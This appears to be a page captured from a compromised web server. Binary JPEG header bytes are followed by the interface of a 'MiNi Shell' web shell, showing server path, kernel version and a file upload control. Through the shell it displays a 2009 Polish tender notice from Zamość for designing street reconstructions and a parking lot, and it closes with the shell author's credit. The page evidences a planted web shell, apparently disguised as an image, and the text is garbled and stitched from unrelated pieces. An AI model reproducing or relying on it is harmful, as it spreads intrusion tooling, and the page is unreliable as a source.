JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090903/146535-N-2009.html

<p class="kh_header"><b>Zamość: Opracowanie projektów : budowlano-wykonawczych na przebudowę ulic : Spadek, Zarwanica, Styczniowej od ulicy Ogrodowej do ulicy Spadek, Nowy Rynek od ulicy Spadek do Zarwanica , Waryńskiego od Ogrodowej do Gminnej , budowa parkingu przy ulicy Styczniowej w Zamościu.</b><br>
<b>Numer ogłoszenia: 146535 - 2009; data zamieszczenia: 03.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Grodzkich  w Zamościu , ul. Partyzantów 61, 22-400 Zamość, woj. lubelskie, tel. 084 6383198, faks 084 6396189.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdg.zamosc.bip.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektów : budowlano-wykonawczych na przebudowę ulic : Spadek, Zarwanica, Styczniowej od ulicy Ogrodowej do ulicy Spadek, Nowy Rynek od ulicy Spadek do Zarwanica , Waryńskiego od Ogrodowej do Gminnej , budowa parkingu przy ulicy Styczniowej w Zamościu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia;
Przedmiotem zamówienia jest: 
Opracowanie projektów : budowlano-wykonawczych na przebudowę ulic : Spadek, Zarwanica, Styczniowej od ulicy Ogrodowej do ulicy Spadek, Nowy Rynek od ulicy Spadek do Zarwanica , Waryńskiego od Ogrodowej do Gminnej , budowa parkingu przy ulicy Styczniowej w Zamościu.
Opracowanie podzielić na poszczególne ulice:
1. Ulica Spadek ,
2. Ulica Zarwanica  , 
3. Ulica Styczniowa od ulicy Ogrodowej do ulicy Spadek,
4. Ulica  Nowy Rynek od ulicy Spadek do Zarwanica,
5. Ulica Waryńskiego od Ogrodowej do Gminnej, 
6. Budowa parkingu przy ulicy Styczniowej.

1. Przedmiot zamówienia na ulicę Spadek; dł. 838m
Planowane przedsięwzięcie dotyczy zaprojektowania:
a)odcinek :  Hrubieszowska-Lwowska ;  przebudowa  szerokość jezdni 5 m , jednostronny chodnik  ; odcinek : Lwowska - Waryńskiego poszerzenie jezdni do 5 m - jako ciąg pieszo- jezdny, 
b)budowa kanalizacji deszczowej z przykanalikami i wpustami,
c)nawierzchnia jezdni bitumiczna, KR-3;
d)nawierzchnia chodnika kostka gr. 6 cm, zjazdy 8 cm,
e)przebudowa oświetlenia - na nowe słupy,
f)budowa rurociągów teleinformatycznych 
g)likwidacja kolizji z sieciami podziemnymi,
h)projekt na stałą organizację ruchu,
i)projekt organizacji ruchu na czas budowy,

2. Przedmiot zamówienia na ulicę Zarwanica ; dł. 206m.
Planowane przedsięwzięcie dotyczy zaprojektowania:
a)budowa kanalizacji deszczowej z przykanalikami i wpustami,
b)nawierzchnia jezdni z kostki brukowej betonowej gr. 8 cm, KR-3;
c)nawierzchnia jednostronnego chodnika kostka gr. 6 cm, zjazdy 8 cm,
d)przebudowa oświetlenia - na nowe słupy,
e)budowa rurociągów teleinformatycznych 
f)likwidacja kolizji z sieciami podziemnymi,
g)projekt na stałą organizację ruchu,
h)projekt organizacji ruchu na czas budowy,

3. Przedmiot zamówienia na ulicę Styczniową od ulicy Ogrodowej do ulicy Spadek; dł. 70m.
Planowane przedsięwzięcie dotyczy zaprojektowania:
a)budowa kanalizacji deszczowej z przykanalikami i wpustami,
b)nawierzchnia jezdni bitumiczna , KR-3;
c)nawierzchnia chodnika kostka gr. 6 cm, zjazdy 8 cm,
d)przebudowa oświetlenia - na nowe słupy,
e)budowa rurociągów teleinformatycznych 
f)likwidacja kolizji z sieciami podziemnymi,
g)projekt na stałą organizację ruchu,
h) projekt organizacji ruchu na czas budowy,

4.  Przedmiot zamówienia na ulicę Nowy Rynek od ulicy Spadek do Zarwanica; dł 169m. 
Planowane przedsięwzięcie dotyczy zaprojektowania:
a)budowa kanalizacji deszczowej z przykanalikami i wpustami,
b)jezdnia jednoprzestrzenna z kostki typu  starobruk   , KR-3;
c)budowa rurociągów teleinformatycznych 
d)likwidacja kolizji z sieciami podziemnymi,
e)projekt na stałą organizację ruchu,
h)projekt organizacji ruchu na czas budowy, przebudowa ulicy,  

5. Przedmiot zamówienia na ulicę Waryńskiego od Ogrodowej do Gminnej ; dł. 100m.
Planowane przedsięwzięcie dotyczy zaprojektowania:
a)budowa kanalizacji deszczowej z przykanalikami i wpustami,
b)nawierzchnia jezdni bitumiczna , KR-3;
c)nawierzchnia chodnika kostka gr. 6 cm, zjazdy 8 cm,
d)przebudowa oświetlenia - na nowe słupy,
e)budowa rurociągów teleinformatycznych 
f)likwidacja kolizji z sieciami podziemnymi,
g)projekt na stałą organizację ruchu,
h)projekt organizacji ruchu na czas budowy,

Część 6. Budowa parkingu przy ulicy Styczniowej .
Planowane przedsięwzięcie dotyczy zaprojektowania: 
a)nawierzchnia na parkingu z płyt ażurowych ;
b)likwidacja ewentualnych kolizji z sieciami nad i podziemnymi ulic,
c)projekt na oznakowanie poziome i pionowe,
d)przebudowa oświetlenia - na nowe słupy,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-1, 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium o wartości: 1 300,00 zł. ( słownie: jeden tysiąc trzysta zł) ,<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności , jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Branżą wiodącą jest branża drogowa.
2) dysponują osobami lub będą dysponować osobami które będą uczestniczyć w wykonywaniu zamówienia , wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia , niezbędnych do wykonania zamówienia , a także zakresu wykonywanych przez nich czynności , którzy posiadają : 
a) uprawnienia do projektowania w zakresie dróg , w zakresie sieci kanalizacyjnych i elektrycznych i  teletechnicznych   zakres uprawnień w zależności od zakresu rzeczowego zadania
b) uprawnienia do wykonywania samodzielnych funkcji w budownictwie w zakresie projektowania określonym w art. 12 i art. 12a ustawy z dnia 7 lipca 1994r.  Prawo budowlane , 
c) kadra projektowa musi posiadać :
d)ważne zaświadczenie o przynależności do Okręgowej Izby Samorządu Zawodowego ,
3)posiadają niezbędną wiedzę i doświadczenie oraz dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie  innych podmiotów do udostępnienia potencjału technicznego  i osób zdolnych do wykonania zamówienia,
a) wykonali w latach 2006-2008 dokumentację na budowę lub przebudowę ulic, w ilości  minimum 3 projekty,
4) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
5) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,

Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą  spełnia - nie spełnia, 
w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww warunki wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów , jakie mają muszą dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu,

Oferta musi zawierać następujące dokumenty i oświadczenia:
1).wypełniony formularz ofertowy [wg załączonego druku] Kosztorys ofertowy Wykonawca obliczy oddzielnie dla wybranych części .
2).aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej potwierdzający, iż Wykonawca prowadzi działalność w zakresie wykonywania prac objętych zamówieniem [wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert]
3).oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 ustawy Pzp [na formularzu ofertowym]
4).aktualną informację z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt.4-8 ustawy Pzp [wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert]
5).aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy Pzp [wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert]
6).aktualne zaświadczenie właściwego Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego [wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert]
7).aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub zaświadczenie że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności [wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert]
8).polisę lub inny  dokument ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej w wysokości nie mniejszej niż wartość przedmiotu zamówienia;
9).wykaz wykonanych w okresie ostatnich trzech lat usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości i odbiorców oraz załączenia dokumentów potwierdzających ze usługi te zostały wykonane należycie 
[wypełniony wg zał.]
10).wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nich czynności, załączyć wymagane prawem uprawnienia do wykonywania określonych czynności i zaświadczenia o przynależności do OIIB - [wypełniony wg zał.]
11). w przypadku zatrudnienia podwykonawców - wskazać w ofercie które części zadania będą im powierzone,
12).wzór  umowy zaakceptowany  przez wykonawcę - [wypełniony wg zał.] 
13). ksero wpłaty wadium, wniesionego w innej  formie niż wplata na konto zamawiającego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdg.zamosc.bip.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Grodzkich w Zamościu , 22-400 Zamość, ul. Partyzantów 61.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2009 godzina 10:00, miejsce: W siedzibie Zamawiającego , w Zarządzie Dróg Grodzkich w Zamościu, ul. Partyzantów 61, pok. nr 4. pietro II..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com